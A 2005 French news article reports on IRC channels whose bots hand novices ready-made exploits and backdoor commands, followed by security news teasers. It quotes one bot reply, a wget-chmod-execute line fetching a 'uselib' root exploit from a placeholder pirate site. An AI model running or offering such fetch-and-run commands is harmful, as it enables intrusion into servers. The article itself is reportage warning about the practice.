Publié le 30-08-2005 dans le thème Hacking

Pays : International - Auteur : Damien Bancal

Pub : Participez à des batailles navales sanglantes et gagnez 10000 € sur Bigpoint.fr

On connaissait les logiciels trouvés sur la toile qui permettaient de casser un mot de passe, d'espionner, dans certaines conditions, un internaute. Voici venir le chan IRC qui diffuse, à qui le souhaite, les méthodes, exploits et backdoors permettant le piratage. En un seul clic le massacre peut commencer. Par Damien Bancal

Ils s'appellent Piratax, Fr0z3nz, Stoopix, SlackWar3. Le point commun de ces internautes, ainsi que de plusieurs centaines d'autres est de se retrouver sur des chans IRC afin de récupérer des informations dédiées au piratage de serveurs Internet. Culture informatique proche du zéro, ils l'avouent eux-mêmes, ils n'ont jamais rien créé mais ont tous le même rêve : devenir un grand hacker. Pour espérer atteindre ce qui reste un éternel fantasme dans l'esprit d'une certaine catégorie d'internautes, il faut accéder aux exploits. Pour cela il y a deux contraintes : la première est de comprendre le code source de l'exploit utilisé et de le modifier à sa convenance si besoin est. La seconde est d'être capable d'utiliser un exploit publié (compilé parfois) afin de s'ouvrir les portes d'un serveur ou d'un site internet. Seulement aujourd'hui, il est possible de modifier une page web, ou d'accéder à un serveur dédié, sans même bouger le moindre petit neurone.

Pièges automatisés
Sur l'un des chans IRC découvert, le bot, un robot permettant d'automatiser certaines actions, est d'une gentillesse à toute épreuve. Selon les commandes envoyées, il propose l'exploit correspondant au mot-clé envoyé ainsi que les commandes à copier- coller pour utiliser celui-ci. Pour ce faire, le pirate qui a mis en place ce lieu de discussion particulier, a infiltré plusieurs serveurs web. Il y a placé des exploits publics, et certains privés, baptisés des "0days", qui permettent d'agir selon le mot-clé spécifié. "Ils vont télécharger des versions compilées d'un exploit, il ne reste plus qu'à l'exécuter, explique un utilisateur français. Moi, ça me permet de tenir à jour la base de données dédiée à la sécurité des clients de l'entreprise qui m'emploie." L'effet est effectivement saisissant.

Les pirates tapent par exemple une commande " !uselib ". Le bot du channel analyse dans sa base de données. Il recherche un exploit correspondant à ce service. Il n'en n'a pas, il renvoie évidemment une erreur. En revanche, dans le cas où il est en possession d'un exploit correspondant à ce service, il renvoie une ligne qui ressemble à celle-là : "wget www.sitepirate.com/0days/uselib; chmod 777 uselib ; ./uselib". Celui-ci communique l'endroit où est stocké l'exploit ainsi que la commande système pour le télécharger. Il permet de changer les droits de l'exploit une fois téléchargé, et donc de l'exécuter. Le pirate n'a donc plus qu'à copier cette ligne afin de devenir root, comprenez l'administrateur de la machine ciblée.

Le bot va nettement plus loin puisqu'il répond à la commande " !backdoor", il permet, une fois l'exploit téléchargé et exécuté, de refaire le même processus, cette fois avec les privilèges administrateurs pour installer une backdoor, comprenez une porte dérobée, afin de créer un accès sur la machine piratée. Cet accès va lui permettre d'y revenir plus tard. Cette backdoor est généralement en Perl ou compilée.

L'exemple "uselib" est assez probant, dans le sens où cet exploit existe vraiment pour la librairie en question. Il est donc possible d'utiliser l'exploit en 1 seconde en copiant les lignes données par le bot. Un accès de Calife à la place du Calife et cela en à peine 4 secondes.

"Ce genre d'espace est un véritable nid à pirates, explique John Jean, directeur de la société de sécurité informatique "Wargan solutions". En effet, la plupart des personnes exécutant ces binaires ne connaissent même pas le code source de ceux-ci, et encore moins leur fonctionnement. Il se peut qu'en créant un accès sur une machine, ils en créent également un à celui qui met à disposition ces binaires. Du piratage ou accès à un serveur à la portée de tous." Même plus besoin de réfléchir à l'acte. Seul le résultat compte. Une démocratisation du piratage qui risque d'entraîner des vagues d'arrestations dans les chambrées de ces internautes qui rêvaient tant d'être de grands pirates. "Avant, j'aidais les webmasters, explique l'un d'eux, Je n'avais même pas de merci. Aujourd'hui, au moins, je suis respecté". Le réveil risque d'être violent !

31 réalisateurs en accord avec la loi création et Internet

Costa-Gavras, Rachid Bouchareb ou encore Gérard Jugnot font parti des réalisateurs à voter pour le projet de loi création et Internet.

Le Top 10 des menaces de juin 2008 selon BitDefender

Pas de changement depuis le dernier classement pour les deux premières places, avec Trojan.clicker.CM et Trojan.Downloader.WMA.Wimad.N. Le trojan Trojan.FakeAlert.PP gagne du terrain.

Sécurité dédiée aux terminaux mobiles

Sybase iAnywhere Offre de nouvelles fonctionnalités de sécurité mobile pour répondre aux problèmes accrus liès aux malware, pirates et virus informatiques.

Authentification forte

Mobilegov, éditeur de solutions de sécurité basées sur la technologie brevetée de l'ADN du Numérique annonce le démarrage de projets pilotes avec deux organismes bancaires majeurs en Europe.

Boulette informatique de la mort qui tue !

L'administration en charge du numéro de Sécurité Sociale diffuse les données sensibles de 20.000 américains qu'elle croyait décédés.

Une page du CNRS redirigée par un pirate

Un groupe de pirates a réussi a rediriger une page Internet appartenant au site du Centre National de la Recherche Scientifique.

Un robot policier pour traquer les heures'supps !

Un robot va patrouiller dans les bureaux d'une firme japonaise afin de contrôler les employés couche tard !

Votre ordinateur contrôlé par la pensée !

Une start-up américaine met au point un casque de contrôle mental de jeux vidéo. La police est déjà intéressée par le matos !

Une page du CNRS redirigée par un pirate

Un groupe de pirates a réussi a rediriger une page Internet appartenant au site du Centre National de la Recherche Scientifique.

Jeu, set et match pour ameliemauresmo.fr

Un jeune pirate informatique souhaite le 29ème anniversaire d'Amélie Mauresmo à sa façon. Il alerte la tennis woman d'une faille de sécurité sur son site web.

Le site d'Ingrid Betancourt souillé

Un pseudo pirate informatique s'est invité dans les pages du site officiel du Comité d'Ingrid Betancourt.

Le site LaCentrale.fr piraté

Exclu - Le site officiel de La centrale, la référence pour l'achat d'une voiture d'occasion visitée par un pirate informatique.

Faille SQL tragique pour la cyberboutique Balmar

Des données privées et confidentielles mises à jour via une faille SQL sur le site de vente en ligne de la société Balmar.

12 millions d'euros de dégâts pour un pirate informatique

La police vient d'arrêter une pirate informatique soupçonné d'avoir occasionné pour plus de 12.5 millions d'euros de dommages en piratant 50.000 cartes de crédit.

La Fédaration Française de Cyclisme piratée

Le site officiel de la Fédaration Française de Cyclisme piratée par des intrus Turcs. Des amateurs de la petite reine un peu trop zelé ?

Coupe de l'UEFA 2008: les pirates Turcs ont déjà gagné !

Les pirates Turcs sont omnis-présents sur la toile. Avec la coupe d'Europe de football ils s'amusent à modifier les sites des adversaires de l'équipe nationale.

Réagissez à ce contenu